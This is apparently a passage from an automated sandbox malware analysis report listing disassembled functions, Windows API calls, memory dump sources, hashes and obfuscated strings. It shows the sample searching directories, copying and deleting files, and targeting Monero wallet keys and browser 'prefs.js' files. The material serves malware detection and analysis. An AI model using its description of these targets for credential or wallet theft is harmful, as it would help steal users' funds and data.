                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009315B8,00930D96), ref: 0091F71E
                                        • StrCmpCA.SHLWAPI(?,009315BC), ref: 0091F76F
                                        • StrCmpCA.SHLWAPI(?,009315C0), ref: 0091F785
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0091FAB1
                                        • FindClose.KERNEL32(000000FF), ref: 0091FAC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 14101b972600d3730555da27afdbbc500ac4df77f16fc1b158dd879a504a1bcb
                                        • Instruction ID: 32fa09c4ca2af7fb5d1592b08aaddd1a455d316bdb7b60124372662fca917c7c
                                        • Opcode Fuzzy Hash: 14101b972600d3730555da27afdbbc500ac4df77f16fc1b158dd879a504a1bcb
                                        • Instruction Fuzzy Hash: 7BB11672A001189BDB24FF60EC96BED7379AFD4300F4085A8E50A97195EF345B49CF96
                                        Function 00CDA8A2 Relevance: 15.4, Strings: 11, Instructions: 1659COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: )O$#Qw{$#uKz$$}o$)uyw$Hg[_$NFNr$]v$p)?${vf$iX
                                        • API String ID: 0-1104099592
                                        • Opcode ID: 090768117266bf5e91e9df0cbe0740cfa4d0cbeda4d6c6d241229b8e59cfc794
                                        • Instruction ID: 22c60bb55f792dfbc8c75e8459b9f028464e6b94eaa411ad917ad88cf2a24b3c
                                        • Opcode Fuzzy Hash: 090768117266bf5e91e9df0cbe0740cfa4d0cbeda4d6c6d241229b8e59cfc794
                                        • Instruction Fuzzy Hash: C1B22AF360C204AFE304AE2DEC8567AFBE9EF94720F16853DE6C4C7744EA7558058692
                                        Function 009116D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0093510C,?,?,?,009351B4,?,?,00000000,?,00000000), ref: 00911923
                                        • StrCmpCA.SHLWAPI(?,0093525C), ref: 00911973
                                        • StrCmpCA.SHLWAPI(?,00935304), ref: 00911989
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00911D40
                                        • DeleteFileA.KERNEL32(00000000), ref: 00911DCA
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00911E20
                                        • FindClose.KERNEL32(000000FF), ref: 00911E32
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: cb70c4dc669b1592c97bc59da2cf3d21be929cac42756652d2c029a8d9f67ce4
                                        • Instruction ID: 5670f4f5190b1fa7a48d5b19c578197d06b7c33ecf65bbc4d69117e48106e818
                                        • Opcode Fuzzy Hash: cb70c4dc669b1592c97bc59da2cf3d21be929cac42756652d2c029a8d9f67ce4
                                        • Instruction Fuzzy Hash: 0212E072911128ABDB19FB60EC96FEE7378AF94300F404599F50A62095EF306F89CF95
                                        Function 0091DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00930C2E), ref: 0091DE5E
                                        • StrCmpCA.SHLWAPI(?,009314C8), ref: 0091DEAE
                                        • StrCmpCA.SHLWAPI(?,009314CC), ref: 0091DEC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0091E3E0
                                        • FindClose.KERNEL32(000000FF), ref: 0091E3F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: 8e0b0c889ef4f646b6d353ded3c02b1bc380e3e98296a8c5d69d41fc817d0a93
                                        • Instruction ID: ba4c98e8c997f210e7124965bd3c756d83015d5315908e333248bf131f716f8b
                                        • Opcode Fuzzy Hash: 8e0b0c889ef4f646b6d353ded3c02b1bc380e3e98296a8c5d69d41fc817d0a93
                                        • Instruction Fuzzy Hash: 44F18E729151289BDB15EB60EC95BEE7338BF98300F4045D9E41A62095EF306F8ACF65
                                        Function 0091DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009314B0,00930C2A), ref: 0091DAEB
                                        • StrCmpCA.SHLWAPI(?,009314B4), ref: 0091DB33
                                        • StrCmpCA.SHLWAPI(?,009314B8), ref: 0091DB49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0091DDCC
                                        • FindClose.KERNEL32(000000FF), ref: 0091DDDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 4f3401cf64b624c2b6ab98b81b5fbd11350560e227890ac30b75f3183d07da2b
                                        • Instruction ID: 57f5640c1af0da16150a8f3fc3a4edf0555256e8876c92bc0c2554332dbad02a
                                        • Opcode Fuzzy Hash: 4f3401cf64b624c2b6ab98b81b5fbd11350560e227890ac30b75f3183d07da2b
                                        • Instruction Fuzzy Hash: D6910573A00118ABCB14FB70FC56BED737DABC8300F408658F94A96195EE349B59CB96
                                        Function 00CDDDDC Relevance: 12.8, Strings: 9, Instructions: 1585COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: {_$~yy$+yw:$O!?9$O!?9$b/R>$hWw$Av}$Z'
                                        • API String ID: 0-1268780608
                                        • Opcode ID: 1c1035093f43de916cb0e83d493f7eafa0e682afffe3571a113198cef50db339
                                        • Instruction ID: 983210e223e71582d4f70103522864625c2209c25ddfb1f4dbd3d30cde54c02d
                                        • Opcode Fuzzy Hash: 1c1035093f43de916cb0e83d493f7eafa0e682afffe3571a113198cef50db339
                                        • Instruction Fuzzy Hash: 70B207F390C2049FE3046E2DEC8577ABBE9EF94720F1A863DEAC4C7744E63558058696
                                        Function 00927B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,009305AF), ref: 00927BE1
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00927BF9
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00927C0D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00927C62
                                        • LocalFree.KERNEL32(00000000), ref: 00927D22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: dd4844e7255edc67f33177a350fc9081edd563250bc65d218b1d2f5fdc3cf0e7
                                        • Instruction ID: 398e2ec9b04ff176e42dcae4853fbadaf5df8f76693e2106687c63a0fc4e1e00
                                        • Opcode Fuzzy Hash: dd4844e7255edc67f33177a350fc9081edd563250bc65d218b1d2f5fdc3cf0e7
                                        • Instruction Fuzzy Hash: CB414171941228ABDB24DB94EC99BEDB778FF84700F2041D9E10972295DB342F85CFA1
                                        Function 00CEBCC1 Relevance: 9.8, Strings: 7, Instructions: 1000COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: +iws$7@A$<ko$K]w$f}_$lrz=$m_[_
                                        • API String ID: 0-1257152523
                                        • Opcode ID: c672a07944aca87d874389283414eedfd6583bca3fc1d01f8b312babf67345b4
                                        • Instruction ID: 8f56d8bc6e2318a8933e81c85d2bac0192f789fdf3afd34148e7096c77a75210
                                        • Opcode Fuzzy Hash: c672a07944aca87d874389283414eedfd6583bca3fc1d01f8b312babf67345b4
                                        • Instruction Fuzzy Hash: 0F62F6F3A08200AFE704AE2DDC8567ABBE6EFD4720F1A493DE6C4C7744E53598158693
                                        Function 0091E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00930D73), ref: 0091E4A2
                                        • StrCmpCA.SHLWAPI(?,009314F8), ref: 0091E4F2
                                        • StrCmpCA.SHLWAPI(?,009314FC), ref: 0091E508
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0091EBDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: 6712bcd45cbf57bf96de893f6cb25ca555eca226c9313955ae2f2885d374cfc3
                                        • Instruction ID: 734a2fe75a4d1c3eef98c18b9514a3cf1157f3f98e083bad8a16c702e8dd3441
                                        • Opcode Fuzzy Hash: 6712bcd45cbf57bf96de893f6cb25ca555eca226c9313955ae2f2885d374cfc3
                                        • Instruction Fuzzy Hash: EC1221739111289BDB18FB60EC96BED7379AFD4300F4045A8F50A66095EE306F89CF96
                                        Function 00CED01D Relevance: 9.1, Strings: 6, Instructions: 1553COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
